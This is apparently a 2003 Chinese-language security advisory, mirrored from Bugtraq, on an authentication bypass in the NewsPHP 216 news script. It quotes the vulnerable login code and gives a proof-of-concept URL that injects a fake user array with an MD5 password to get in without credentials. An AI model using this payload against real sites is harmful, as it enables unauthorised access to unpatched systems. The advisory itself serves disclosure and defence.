NewsPHP绕过访问验证漏洞
发布日期:2003-08-25
更新日期:2003-08-29
受影响系统:newsPHP newsPHP 216
描述:
BUGTRAQ ID:
8489
NewsPHP是一款基于PHP的新闻发布程序。
NewsPHP不正确处理验证过程,远程攻击者可以利用这个漏洞未授权无需密码访问NewsPHP系统。
问题存在于nphpd.php中,问题代码如下:
[...]
LoadSettings($nphp_config, $nphp_users);
[...]
for($i = 0; $i < count($nphp_users); $i++)
{
if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && \
($nphp_users[$i][1] == md5($pword))) {
[...]
// hmmmm so we can inject users using nphp_users[index] in url
通过在URL中使用nphp_users[index]插入用户,并提供用户的MD5密码信息,就可以无需帐户访问系统。
<*来源:Officerrr (
officerrr@poligon.com.pl)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106194537922103&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Officerrr (
officerrr@poligon.com.pl)提供了如下测试方法:
http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5
建议:
厂商补丁:
newsPHP
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.newsphp.com/浏览次数:2855
严重程度:0(网友投票)